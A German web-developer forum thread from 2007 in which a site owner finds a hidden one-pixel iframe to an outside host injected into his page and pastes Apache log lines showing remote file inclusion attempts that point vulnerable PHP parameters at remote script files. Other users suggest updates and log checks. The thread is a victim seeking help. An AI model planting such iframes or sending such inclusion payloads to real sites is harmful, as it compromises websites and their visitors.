Willkommen in der Webstatt Zum Webstatt Blog und Stories
Bonze am 06.05.07 14:56

hey leute wie kann das sein ?
und zwar hab ich eben auf quelltextansicht geklickt auf meiner site http://www.alekeijer-kerb.de
und dann fand ich das hier!
<iframe src='http://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'></iframe>

das komische ist ich bin mir 10000%ig sicher das ich das nicht eingefügt hab ,
meine andere seite [URL]www.partypix-kohlbachtal[/URL] .de ist wahrscheinlich durch ne sicherheitslücke im gallerysys gehacked worden(wahrscheinlich sogar mit nem bot der auf diese lücke programmiert ist)
wie kann das sein ? hat da jemand zurgriff auf meine dateien?

PS: kann das etwas mit den CHMOD rechten zu tun haben ?

netcup.de Warum gibt es hier Werbung?
bastey bastey am 06.05.07 15:14

Menschen machen immer Fehler. Es wird immer Schwachstellen in einem Script oder Programm geben. Diese werden halt von einigen bösen Menschen ausgenutzt. Deswegen ist es ja so wichtig, das man immer fein seine Updates einspielt.

Du kannst ja einfach mal in den Logdaten des Apaches schauen, ob du dort etwas ungewöhnliches findest.

Bonze am 06.05.07 15:24

ich weiss garnich nach was ich suchen soll, einmal hab ich ne acess log (zugriffe auf den webspace) und ne ftp log , ..

Bonze am 06.05.07 15:27

hab was gefunden!

2007-05-02
70.87.89.10 - - [02/May/2007:15:58:13 +0200] "GET /admin.php?page=http://www.freewebtown.com/haxors/main.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.805"
204.14.18.149 - - [02/May/2007:20:05:27 +0200] "GET //adminpanel/includes/add_forms/addbioform.php?root_path=http://connectaserver.de/ckb_backup_for_digest_inst/admin/mods/admin_userlist/processed/language/lang_english/freeman.txt? HTTP/1.1" 404 329 "-" "libwww-perl/5.64"
2007-05-04
71.6.232.252 - - [04/May/2007:04:10:16 +0200] "POST /\"http:/www.http:/www.nowgoto.ws/fls/\" HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; ru; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10"

schaut euch das mal an ,. könnte damit was zu tun haben oder?

crooked am 06.05.07 15:31

Bei .de.vu Domains und so wird auch per Frame eingebunden. Vielleicht liegts dadran?

Bonze am 06.05.07 15:46

mhh ka hab auf jeden ne .de domain!
ich glaub eher da hat jemand versucht diese datei runzuwurschdeln ,.

hab jetzt mal meine index.php nur mit leserechten ausgestattet und siehe da, seitdem wurde nichts mehr drin verändert!
aber das kann es ja nicht sein , und durch welche sicherheitslücke konntebdas passieren?
ich hab dieses menü welches auf arrays beruht ich glaube das von jex-treme ,. so einfach kann man da doch nichts einschleusen oder?

Creative Commons Lizenzvertrag
Alle Inhalte des Webstatt-Archivs stehen unter einer Creative Commons Namensnennung - Weitergabe unter gleichen Bedingungen 3.0 Unported Lizenz.

Impressum & Kontakt